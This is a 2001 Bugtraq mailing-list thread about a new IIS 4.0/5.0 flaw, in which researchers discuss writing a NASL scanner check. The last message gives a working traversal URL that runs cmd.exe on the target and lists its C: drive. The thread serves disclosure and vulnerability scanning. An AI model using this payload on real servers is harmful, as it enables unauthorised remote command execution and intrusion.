From: "ALife // BERG" <buginfo@inbox.ru>
To: <Bugtraq@securityfocus.com>
Sent: Wednesday, September 19, 2001 11:38 AM
Subject: New vulnerability in IIS4.0/5.0

Re: Fw: New vulnerability in IIS4.0/5.0 [ In reply to ]
On Wednesday 19 September 2001 11:29 am, Felix Huber wrote:
> I just wrote a NASL for this Bug. Its untested but I hope it works.
> The problem was I found no IIS where I could reproduce this error ( I
> testet five IIS 4 and IIS 5 Boxes ).
> I will improve it when i found a working Box ...

I too can't reproduce the problem...
Re: Fw: New vulnerability in IIS4.0/5.0 [ In reply to ]
On Wed, Sep 19, 2001 at 06:29:19PM +0200, Felix Huber wrote:
> I just wrote a NASL for this Bug. Its untested but I hope it works.
> The problem was I found no IIS where I could reproduce this error ( I testet
> five IIS 4 and IIS 5 Boxes ).
> I will improve it when i found a working Box ...

I think it would be wiser to re-use iis_dir_traversal.nasl, which was
heavily worked on and which does not only check for /scripts.

Attached is a modified version of it (but I don't know if it works or
not, I could not reproduce the flaw yet).

-- Renaud
Re: Fw: New vulnerability in IIS4.0/5.0 [ In reply to ]
Reproduced against two default IIS installs (4.0 and 5.0):

http://host/msadc/..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\

These boxes were vulnerable to unicode and the double decode, so I can't say
for certain whether this affects patched systems.

--
H D Moore
http://www.digitaldefense.net - work